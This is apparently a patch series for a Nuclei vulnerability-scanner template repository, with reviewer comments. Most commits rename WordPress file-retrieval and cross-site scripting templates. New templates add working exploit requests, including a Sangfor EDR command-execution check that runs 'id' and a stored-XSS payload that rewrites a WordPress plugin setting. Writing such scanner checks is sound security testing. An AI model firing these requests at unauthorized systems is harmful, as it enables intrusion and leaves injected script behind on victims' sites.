pikpikcu severity: medium description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the @@ -26,4 +26,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml index 2a331438d4..fd86eaf40f 100644 
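Review bot: The rewritten description in the pmb-directory-traversal hunk contains a typo, `wchi can be used for local file retrieval`. I would change it to `description: PMB does not sanitize the 'chemin' parameter, which can be used for local file retrieval.`, or at minimum correct `wchi` to `which`.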
--- a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml +++ b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml @@ -1,7 +1,7 @@ id: admin-word-count-column-lfi info: - name: Admin word count column 2.2 - Unauthenticated Local File Download + name: Admin word count column 2.2 - Arbitrary File Retrieval author: daffainfo,Splint3r7 severity: high reference: diff --git a/vulnerabilities/wordpress/aspose-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml index 2ba41f16fb..2c4b91c5d4 100644 --- a/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-file-download info: - name: Aspose Cloud eBook Generator - File Download + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://wpscan.com/vulnerability/7866 tags: wordpress,wp-plugin,lfi,aspose,ebook diff --git a/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 095211f5e4..ae52c36233 100644 --- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml 
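Review bot: Renaming to `Admin word count column 2.2 - Arbitrary File Retrieval` drops the "Unauthenticated" qualifier, and nothing else shown in this hunk carries it, since there is no `description` and the `tags` line lies outside the hunk. Whether a finding needs credentials is one of the first things a triager checks, and the same loss occurs in the `aspose-words-file-download` and `flow-flow-social-stream-xss` renames later in this patch. I would keep it, e.g. `name: Admin word count column 2.2 - Unauthenticated Arbitrary File Retrieval`, or confirm that each of these templates carries the `unauth` tag.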
@@ -1,10 +1,10 @@ id: aspose-ie-file-download info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 338fb37c0d..48c499bc3a 100644 --- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-pdf-file-download info: - name: WordPress Aspose PDF Exporter File Download + name: WordPress Aspose PDF Exporter - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.psf Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter diff --git a/vulnerabilities/wordpress/aspose-words-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml index a9187a88fa..ac80fecb8c 100644 --- a/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml 
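Review bot: The rewritten description in the aspose-pdf-file-download hunk still says `Aspose.psf Exporter`, while the name on the line above is `WordPress Aspose PDF Exporter`. This looks like a carried-over typo for the plugin name; since the line is being rewritten anyway, I would change it to `description: The Aspose PDF Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability.`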
@@ -1,10 +1,10 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml index c23bee2695..8ebd3cd3c1 100644 --- a/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -1,11 +1,10 @@ id: cherry-file-download info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload author: 0x_Akoko severity: high - description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading - backdoor shell scripts or downloading the wp-config.php file. + description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://github.com/CherryFramework/cherry-plugin diff --git a/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml index 5afd776733..366df9bb91 100644 --- a/vulnerabilities/wordpress/diarise-theme-lfi.yaml 
+++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -1,10 +1,10 @@ id: diarise-theme-lfi info: - name: WordPress Diarise 1.5.9 Local File Disclosure + name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index 19cfc73b7b..af1015d333 100644 --- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -1,7 +1,7 @@ id: flow-flow-social-stream-xss info: - name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS + name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting author: alph4byt3 severity: medium reference: diff --git a/vulnerabilities/wordpress/hb-audio-lfi.yaml b/vulnerabilities/wordpress/hb-audio-lfi.yaml index fe14c73834..4a0e7ea744 100644 --- a/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -1,7 +1,7 @@ id: hb-audio-lfi info: - name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval author: dhiyaneshDK severity: high reference: diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index 7bb0cdbba5..6f1dfbf9fe 100644 --- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml 
@@ -1,10 +1,10 @@ id: nativechurch-wp-theme-lfd info: - name: WordPress NativeChurch Theme Arbitrary File Download + name: WordPress NativeChurch Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. + description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. reference: - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi diff --git a/vulnerabilities/wordpress/sniplets-xss.yaml b/vulnerabilities/wordpress/sniplets-xss.yaml index 1e4278a691..195e8e384f 100644 --- a/vulnerabilities/wordpress/sniplets-xss.yaml +++ b/vulnerabilities/wordpress/sniplets-xss.yaml @@ -1,7 +1,7 @@ id: sniplets-xss info: - name: Wordpress Plugin Sniplets - XSS + name: Wordpress Plugin Sniplets - Cross-Site Scripting author: dhiyaneshDK severity: medium description: Cross-site scripting (XSS) on Wordpress Plugin Sniplets diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index cc7746bd83..05bc6af882 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -1,7 +1,7 @@ id: wordpress-wordfence-lfi info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval author: 0x_Akoko severity: high reference: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml index 94a67888df..b0a50a1cfe 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-waf-bypass-xss.yaml 
@@ -1,7 +1,7 @@ id: wordpress-wordfence-waf-bypass-xss info: - name: Wordfence WAF Bypass WordPress XSS + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam severity: medium reference: diff --git a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index fff2243202..4094c066d1 100644 --- a/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -1,7 +1,7 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium reference: @@ -37,4 +37,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/wordpress/wp-code-snippets-xss.yaml b/vulnerabilities/wordpress/wp-code-snippets-xss.yaml index b0c4a89491..ebf8c132fd 100644 --- a/vulnerabilities/wordpress/wp-code-snippets-xss.yaml +++ b/vulnerabilities/wordpress/wp-code-snippets-xss.yaml @@ -1,7 +1,7 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - XSS + name: Code Snippets Wordpress Plugin - Cross-Site Scripting author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, diff --git a/vulnerabilities/wordpress/wp-full-path-disclosure.yaml b/vulnerabilities/wordpress/wp-full-path-disclosure.yaml index 1fc892990b..979bcb56a4 100644 --- a/vulnerabilities/wordpress/wp-full-path-disclosure.yaml +++ b/vulnerabilities/wordpress/wp-full-path-disclosure.yaml 
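Review bot: The new name `Wordpress Wordfence WAF - Cross-Site Scripting` drops the word "Bypass" and now reads as if the flaw were in Wordfence itself, while the template id is still `wordpress-wordfence-waf-bypass-xss`. Judging from the old name and the id, the finding is an XSS payload that gets past the WAF, which calls for a different remediation than a bug in the plugin. Something like `name: WordPress Wordfence WAF Bypass - Cross-Site Scripting` keeps the house format without changing the meaning.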
@@ -1,11 +1,12 @@ id: wp-full-path-disclosure info: - name: Wordpress Full Path Disclosure + name: Wordpress - Path Disclosure author: arcc severity: info reference: - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files + - https://core.trac.wordpress.org/ticket/38317 tags: debug,wordpress,fpd requests: diff --git a/vulnerabilities/wordpress/wp-haberadam-idor.yaml b/vulnerabilities/wordpress/wp-haberadam-idor.yaml index 9394923565..c8001614ba 100644 --- a/vulnerabilities/wordpress/wp-haberadam-idor.yaml +++ b/vulnerabilities/wordpress/wp-haberadam-idor.yaml @@ -1,7 +1,7 @@ id: wp-haberadam-idor info: - name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API + name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure author: pussycat0x severity: low reference: diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 84794cc49f..2621c00a21 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -1,10 +1,10 @@ id: wp-oxygen-theme-lfi info: - name: WordPress Oxygen-Theme Themes LFI + name: WordPress Oxygen-Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. + description: The WordPress Oxygen-Theme has a local file retrieval vulnerability in 'file' parameter of 'download.php'. reference: - https://cxsecurity.com/issue/WLB-2019030178 tags: wordpress,wp-theme,lfi @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/vulnerabilities/wordpress/wp-revslider-file-download.yaml b/vulnerabilities/wordpress/wp-revslider-file-download.yaml index 812736d277..c5ea28f80a 100644 
--- a/vulnerabilities/wordpress/wp-revslider-file-download.yaml +++ b/vulnerabilities/wordpress/wp-revslider-file-download.yaml @@ -1,10 +1,10 @@ id: wp-revslider-file-download info: - name: Wordpress Revslider - Unauthenticated Arbitrary File Download + name: Wordpress Revslider - Arbitrary File Retrieval author: pussycat0x severity: high - description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + description: The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 diff --git a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml index 56218e0bae..f3d8f59e94 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml @@ -1,7 +1,7 @@ id: wp-woocommerce-file-download info: - name: WordPress WooCommerce < 1.2.7 - Unauthenticated File Download + name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval author: 0x_Akoko severity: high description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated diff --git a/workflows/gogs-workflow.yaml b/workflows/gogs-workflow.yaml index e1ab4de7a7..c5103b1456 100644 --- a/workflows/gogs-workflow.yaml +++ b/workflows/gogs-workflow.yaml 
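Review bot: The rewritten description has a typo and a missing article: `plugin iss affected` and `result in attacker downloading`. I would make it `description: The Revslider WordPress plugin is affected by an unauthenticated file retrieval vulnerability, which could result in an attacker downloading the wp-config.php file.`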
@@ -1,7 +1,7 @@ id: gogs-workflow info: - name: Gogs Security Checks + name: Gogs (Go Git Service) - Security Checks author: daffainfo description: A simple workflow that runs all Gogs related nuclei templates on a given target. From 4ad2b7be7bb7387db86463d7a38bac75b6b7ca46 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 13 May 2022 16:39:44 -0400 Subject: [PATCH 25/68] Dashboard Content Enhancements (#4390) Dashboard Content Enhancements --- cves/2018/CVE-2018-20985.yaml | 1 - cves/2018/CVE-2018-3810.yaml | 1 - 2 files changed, 2 deletions(-) diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 4da57ce3f1..71ed01c5b8 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -36,5 +36,4 @@ requests: status: - 200 - # Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index 4602a84822..69322dfcea 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -44,5 +44,4 @@ requests: status: - 200 - # Enhanced by mp on 2022/05/13 From 3f89a324fa83854b634791662c5ae997234559c6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Sat, 14 May 2022 15:30:47 +0800 Subject: [PATCH 27/68] Create CVE-2022-30489.yaml --- cves/2022/CVE-2022-30489.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-30489.yaml diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..6d7a6408b2 --- /dev/null +++ b/cves/2022/CVE-2022-30489.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2022-30489 + +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: high + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + tags: xss,cve2022,wavlink + +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + + matchers-condition: and + matchers: + - type: word + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4e8701a61a97e3ab4049b87e927f80cd09fd4206 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 May 2022 15:56:45 +0530 Subject: [PATCH 28/68] using variables instead of payloads --- cves/2022/CVE-2022-1388.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-1388.yaml b/cves/2022/CVE-2022-1388.yaml index e485e626c0..ec2987aa1b 100644 --- a/cves/2022/CVE-2022-1388.yaml +++ b/cves/2022/CVE-2022-1388.yaml @@ -25,6 +25,7 @@ info: variables: auth: "admin:" + cmd: "echo CVE-2022-1388 | rev" requests: - raw: @@ -54,10 +55,6 @@ requests: "utilCmdArgs": "-c '{{cmd}}'" } - payloads: - cmd: - - 'echo CVE-2022-1388 | rev' - stop-at-first-match: true matchers-condition: and matchers: From 1cb764709e0c1368d5a0e7f3f50c59c9f6543ac6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 16:35:15 +0530 Subject: [PATCH 30/68] Create CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cnvd/2020/CNVD-2020-46552.yaml 
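Review bot: `severity: high` in the new CVE-2022-30489 template is out of line with every other cross-site scripting template visible in this series, which are rated `medium`, and there is no `description` or `classification` block to support the higher rating. As rendered on this page the first word matcher is `- ''` and the `hostname` parameter stops at `")`; if the file really contains that rather than markup lost in rendering, the matcher is satisfied by any body and every `text/html` 200 response from `login.cgi` is reported. I would add a one-sentence `description`, set the severity from the published score, and make the word matcher assert the exact reflected string with `part: body`.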
diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..20bc744c8b --- /dev/null +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -0,0 +1,35 @@ +id: CNVD-2020-46552 +info: + name: Sangfor EDR Tool RCE + author: ritikchaddha + severity: critical + description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + tags: cnvd,cnvd2020,sangfor,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "$show_input = function($info)" + - "$strip_slashes($host)" + condition: and + + - type: word + part: body + words: + - "uid=0(root)" + + - type: status + status: + - 200 From d9746db4f35521fc4e0cc5f2e850947fbb02b260 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 22:21:49 +0530 Subject: [PATCH 31/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 25 +++++++++++-------------- 1 file changed, 11 insertions(+), 14 deletions(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 20bc744c8b..6727df6300 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml 
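Review bot: Under `matchers-condition: or` the third matcher (`type: status` with `200`) is sufficient on its own, so any host that answers 200 on `/tool/log/c.php`, including one with a catch-all page, is reported as critical RCE. The status check has to be combined with the content evidence rather than listed as an alternative to it; each content matcher should require the 200 together with its own strings, and the standalone status matcher should go. The `id:` line is also followed directly by `info:` with no blank line, unlike the other templates in the series.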
@@ -15,21 +15,18 @@ requests: path: - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - + matchers-condition: or matchers: - - type: word - part: body - words: - - "$show_input = function($info)" - - "$strip_slashes($host)" + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'status_code == 200' condition: and - - type: word - part: body - words: - - "uid=0(root)" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(body, "uid=0(root)")' + - 'status_code == 200' + condition: and From 651dd7674ee30aaf23f556e4472a6d481872cce0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 14 May 2022 22:23:47 +0530 Subject: [PATCH 32/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 6727df6300..8d1a9d324f 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -15,7 +15,7 @@ requests: path: - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - + matchers-condition: or matchers: - type: dsl From dd63461ec109b125cccb05215f6d828fc8e23dd7 Mon Sep 17 00:00:00 2001 From: gy741 Date: Sun, 15 May 2022 08:01:56 +0900 Subject: [PATCH 33/68] Update CVE-2022-30525.yaml (#4396) shodan query added Signed-off-by: GwanYeong Kim --- cves/2022/CVE-2022-30525.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml index 359020a92e..d16b0266ff 100644 --- a/cves/2022/CVE-2022-30525.yaml +++ b/cves/2022/CVE-2022-30525.yaml 
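Review bot: The second dsl matcher accepts only `uid=0(root)`, so an appliance whose web process runs under any other account produces `id` output that the template ignores and the host is reported clean. Matching the general shape of the output avoids that false negative, e.g. replace `- 'contains(body, "uid=0(root)")'` with `- 'contains(body, "uid=") && contains(body, "gid=")'`. The hunk starts at line 15 of the file, so the `info` block is not visible here.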
@@ -10,6 +10,8 @@ info: - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - https://github.com/rapid7/metasploit-framework/pull/16563 - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + metadata: + shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" tags: rce,zyxel,cve,cve2022,firewall,unauth requests: From a3ce25a5a6bf0ce25673c31a70cb1baa3e3f734f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 15 May 2022 04:32:53 +0530 Subject: [PATCH 35/68] Authenticated Wordpress XSS Templates (#4398) * Create CVE-2021-25075.yaml * Create seo-redirection-xss.yaml --- cves/2021/CVE-2021-25075.yaml | 54 +++++++++++++++++++ .../wordpress/seo-redirection-xss.yaml | 53 ++++++++++++++++++ 2 files changed, 107 insertions(+) create mode 100644 cves/2021/CVE-2021-25075.yaml create mode 100644 vulnerabilities/wordpress/seo-redirection-xss.yaml diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml new file mode 100644 index 0000000000..7f86e9332d --- /dev/null +++ b/cves/2021/CVE-2021-25075.yaml 
@@ -0,0 +1,54 @@
+id: CVE-2021-25075
+
+info:
+ name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues.
+ remediation: Fixed in version 1.5.1.
+ reference:
+ - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
+ tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
+
+ - |
+ GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
+ - "toplevel_page_wpda_duplicate_post_menu"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml
new file mode 100644
index 0000000000..f690939fcb
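Review bot: The second raw request in the new cves/2021/CVE-2021-25075.yaml overwrites the plugin's `title_prefix` setting with a script payload and nothing afterwards restores the previous value, so scanning a vulnerable site leaves a stored XSS and a changed setting behind. Templates that modify target state are normally marked so they can be excluded from routine scans; adding `intrusive` to `tags` and saying so in `description` would cover that. The same request carries `?action=wprss_fetch_items_row_action` in the URL while the body sends `action=wpdevart_duplicate_post_parametrs_save_in_db`; the query-string value looks like a leftover from another template and should be dropped. The body word matcher has no `condition`, so the menu string `toplevel_page_wpda_duplicate_post_menu` alone satisfies it and `condition: and` is needed there.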
--- /dev/null
+++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml
@@ -0,0 +1,53 @@
+id: seo-redirection-xss
+
+info:
+ name: SEO Redirection < 7.4 - Reflected Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue.
+ remediation: Fixed in version 7.4.
+ reference:
+ - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea
+ tags: wordpress,xss,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
